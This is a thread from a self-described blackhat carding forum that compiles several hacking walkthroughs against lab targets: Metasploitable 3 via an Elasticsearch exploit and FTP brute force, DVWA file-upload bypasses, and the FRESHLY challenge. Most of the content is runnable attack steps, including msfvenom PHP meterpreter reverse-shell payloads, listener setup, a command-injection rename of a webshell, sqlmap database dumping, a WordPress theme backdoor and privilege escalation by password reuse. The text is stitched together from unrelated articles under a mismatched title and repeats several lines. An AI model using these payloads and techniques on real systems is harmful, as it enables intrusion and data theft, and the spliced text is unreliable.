[Guide] How to Hack Metasploitable 3 using Elasticsearch Exploit

[Guide] How to Hack Metasploitable 3 using Elasticsearch Exploit - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Hack Metasploitable 3 using Elasticsearch Exploit (/Thread-Guide-How-to-Hack-Metasploitable-3-using-Elasticsearch-Exploit)

[Guide] How to Hack Metasploitable 3 using Elasticsearch Exploit - NINZA - 04-25-2020

Elastic search is a distributed REST search engine used in companies for analytic search. And so we will learn how to exploit our victim through it. Start off by nmap.
nmap –p- -A 192.168.1.8
[Image: 1.png?w=687&ssl=1]

Nmap shows a splendid result and in that result you can see that HHTP service going on 9200 which is using elasticseatch REST. Let’s search it exploit on google.
[Image: 2.png?w=687&ssl=1]

YES! We have an exploit for that. Let’s use it to our advantage.
[Image: 3.png?w=687&ssl=1]

To use this exploit go to Metasploit and type:
use exploit/multi/elasticsearch/script_mvel_rce
msf exploit (script_mvel_rce)>set rhost 192.168.1.8
msf exploit (script_mvel_rce)>set rport 9200
msf exploit (script_mvel_rce)>exploit
[Image: 4.png?w=687&ssl=1]

Metasploitable3 is a VM that is built from the ground up with a large number of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit, hence to brush up our Metasploit skills.
We already know that our target is metasploitable 3 so there is no point to discover our target. So, let’s straight move up to nmap scan.
nmap –p- -sV 192.168.1.8
[Image: 1.png?w=687&ssl=1]

We can see that FTP port is open so we can exploit it and for doing so we need a dictionary file through which we can successfully attack. To make a dictionary file type the following command :
cewl

[To see content please register here]

-m 7 -d 0 –w /root/Desktop/dict.txt
CeWL is a command used to make a customized wordlist using a given URL. Using the above command will make a dictionary file from the Wikipedia of metasploitable3 and might help us to find our password.
[Image: 2.png?w=687&ssl=1]

After generating the wordlist through CeWL, open Metasploit by typing msfconsole on the terminal of your Kali.
[Image: 3.1.png?w=687&ssl=1]

And then type:
use auxiliary/scanner/ftp/ftp_login
msf exploit (ftp_login)>set username vagrant
msf exploit (ftp_login)>set rhosts 192.168.1.8
msf exploit (ftp_login)>set pass_file /root/Desktop/pass.txt
msf exploit (ftp_login)>set stop_on_success true
msf exploit (ftp_login)> exploit
[Image: 3.png?w=687&ssl=1]

Above used exploit will give you a correct password to go with the username. Once you have got it then open the WinScp software, give the target’s IP and the port number along with the username: vagrant and password: vagrant
[Image: 4.png?w=687&ssl=1]

Then click on the Login button. After logging in you can find you the files on the FTP server and you can use them to your advantage.
[Image: 5.png?w=687&ssl=1]

This is how you can use FTP port to log in to your victim’s PC. Enjoy!

File upload vulnerability are a major problem with web based applications. In many web server this vulnerability depend entirely on purpose that allows an attacker to upload a file hiding malicious code inside that can then be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.
Attacker may reveal internal information of web server to other and some chances to sensitive data might be informal, by unauthorized people.
In DVWA the webpage allows user to upload an image, and the webpage go through with program coding and checks if the last characters of the file is ‘.jpg’ or ‘.jpeg’ or ’.png’ before allowing the image get uploaded in directory.
Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, metasploit framework
DVWA lab in your XAMPP or WAMP server, read full article from

[To see content please register here]

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:
Username – admin
Password – password
Bypass Low Level Security
Click on DVWA Security and set Website Security Level low
[Image: 1.png?w=687&ssl=1]

Open terminal in kali linux and create php backdoor through following command
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Copy and paste the highlighted code in leafnod and save as with PHP extension as hack.php on the desktop.
[Image: 2.png?w=687&ssl=1]

Come back to your DVWA lab and click to file upload option from vulnerability menu.
Now click to browse button to browse hack.php file to upload it on web server and click on upload which will upload your file in directory of server.
[Image: 3.png?w=687&ssl=1]

After uploading a PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and past it in URL to execute it.
hackable/uploads/hack.php
[Image: 4.png?w=687&ssl=1]

Before executing this URL on browser start and run multi handler in metasploit framework using below command. While the multi handler will run execute the below URL of PHP file in browser. This’ll provide you a meterpreter session 1.
192.168.1.102:81/DVWA/hackable/uploads/hack.php
[Image: 5.png?w=687&ssl=1]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 3333
msf exploit(handler) > run
meterpreter > sysinfo
1
2
3
4
5
6
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 3333
msf exploit(handler) > run
meterpreter > sysinfo
[Image: 6.png?w=687&ssl=1]

Bypass Medium Level Security
Click on DVWA Security and set Website Security Level medium
[Image: 7.png?w=687&ssl=1]

Same process to create php backdoor.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
Now Save the selected code as raj.php.jpeg on desktop. Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file.
[Image: 8.png?w=687&ssl=1]

Come back to your DVWA lab and click to file upload option from vulnerability menu.
Again click to browse button to browse raj.php.jpeg file to upload it. Now start burp suit and make intercept on under proxy tab. Don’t forget to set manual proxy of your browser and click on upload.
[Image: 9.1.png?w=687&ssl=1]

Intercept tab will work to catch post method when you click to upload button. Now convert raj.php.jpeg into raj.php
[Image: 9.png?w=687&ssl=1]

Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory.
[Image: 10.png?w=687&ssl=1]

This will show the path of uploaded file of the directory where file is successfully uploaded.
hackable/uploads/raj.php
[Image: 11.png?w=687&ssl=1]

Now repeat the whole process same as in low security to execute PHP file in URL.
192.168.1.102:81/DVWA/hackable/uploads/raj.php
[Image: 12.png?w=687&ssl=1]

This’ll provide a meterpreter session 2 when you run URL in browser.
meterpreter > sysinfo
[Image: 13.png?w=687&ssl=1]

Bypass High Level Security
Click on DVWA Security and set Website Security Level High
[Image: 14.png?w=687&ssl=1]

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
[Image: 15.png?w=687&ssl=1]

Now Save the selected code as shell.jpeg on desktop. Since this file will get upload in high security which is little different from low and medium security as this will apparently check the extension of file as well as piece of code also therefore type GIF98 before PHP code and save as shell.jpeg.
[Image: 16.png?w=687&ssl=1]

Repeat the process to browse shell.jpeg
[Image: 17.1.png?w=687&ssl=1]

Again you will get directory path of uploaded file.
[Image: 17.png?w=687&ssl=1]

This PHP file cannot directly execute on URL as it uploaded with jpeg extension. For rename this file into PHP file click to command injection option from vulnerability. Here this vulnerability let you copy and rename this shell.jpeg into PHP file. Types following in text box which will copied and rename shell.jpeg into aa.php
| copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php
1
| copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php
[Image: 18.png?w=687&ssl=1]

When you will submit the command the PHP file get copied with new name as aa.php
[Image: 19.png?w=687&ssl=1]

Now repeat the process to execute PHP file in URL.
192.168.1.102:81/DVWA/hackable/uploads/aa.php
1
192.168.1.102:81/DVWA/hackable/uploads/aa.php
[Image: 20.1.png?w=687&ssl=1]

Wonderful!! Here we get meterpreter session 3 also.
meterpreter > sysinfo
[Image: 20.png?w=687&ssl=1]

Here we come with a new article which will all be about a penetration testing challenge called FRESHLY. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. It’s an easy lab. let’s get started with it and access it.
Download from here :

[To see content please register here]

Breaching Methodology

Network Scanning (Nmap)
Recon (Nikto)
Login Form Based SQL Injection
Abusing WordPress
Generate PHP Backdoor (Msfvenom)
Upload and execute a backdoor
Reverse connection (Metasploit)
Take root access

Let’s Start!!
So to start with it firstly we have to find out the IP of FRESHLY. For that type the netdiscover command in the terminal of Kali. It will show each IP present in our network.
Now we have target IP: 192.168.1.112 so let’s scan it with aggressive scan (-A).
nmap -p- -A 192.168.1.112
1
nmap -p- -A 192.168.1.112
[Image: 1.png?w=687&ssl=1]

This shows all open ports: 80, 8080, 443.
As we can see 80 port is open so we will open target IP in our browser to find out what’s in there as our next clue.
[Image: 2.png?w=687&ssl=1]

Next, we will apply the Nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type: Nikto -h [host URL].
[Image: 3.png?w=687&ssl=1]

After scanning it shows that there is a login.php page found. So open it in a browser with target IP
[Image: 4.png?w=687&ssl=1]

Since we don’t know the exact username and password, therefore, we have used SQLMAP for login form based injection for retrieving the database name and login credential by executing the following command.
sqlmap -u 'http://192.168.1.112/login.php' --forms --risk=3 --level=5 --dbs
1
sqlmap -u 'http://192.168.1.112/login.php' --forms --risk=3 --level=5 --dbs
[Image: 5.png?w=687&ssl=1]

From the sqlmap result, we came to that the name of the database could be“wordpress8080”, so now using sqlmap again fetch username and password from that database i.e. WordPress 8080
sqlmap -u 'http://192.168.1.112/login.php' --forms -D wordpress8080 --risk=3 --level=3 --dump-all
1
sqlmap -u 'http://192.168.1.112/login.php' --forms -D wordpress8080 --risk=3 --level=3 --dump-all
[Image: 6.png?w=687&ssl=1]

Alright, we have achieved our first step by finding out user and password for WordPress.
User = admin
Password = SuperSecretPassword
1
2
User = admin
Password = SuperSecretPassword
Earlier we have already found out our open ports so use one of not used ports to open in browser ie.8080
Cool…See what you have got…. Now click on this link and you are all set for the further result.
[Image: 7.png?w=687&ssl=1]

Candy goodness!!!!! It’s our WordPress page. So let’s get on to other steps by opening a WordPress login page and entering the credentials we found out i.e.
User= admin
Password= SuperSecretPassword
1
2
User= admin
Password= SuperSecretPassword
[Image: 8.png?w=687&ssl=1]

Once you have logged in, make the malicious file that you got to upload in it. Generate code through the msfvenom command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.132 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.132 lport=4444 -f raw
Side by side in other terminal open Metasploit and run multi handler.
[Image: 9.png?w=687&ssl=1]

From generated php raw file copy the code from <?php to die(). As we want to read a file on the system, let’s put some PHP code in the theme: We go to Appearance -> themes -> 404.php and add some PHP code in order to execute it.
[Image: 10.png?w=687&ssl=1]

Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.132
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
1
2
3
4
5
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.132
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
From given below image you can observe Meterpreter session1, now start penetrating for accessing root privilege. Then to access proper TTY shell we had import python one line script by typing following:
python -c 'import pty;pty.spawn("/bin/bash")'
1
python -c 'import pty;pty.spawn("/bin/bash")'
To get root access account credential reuse from the WordPress admin password SuperSecretPassword that allowed su – to escalate privileges.
[Image: 11.png?w=687&ssl=1]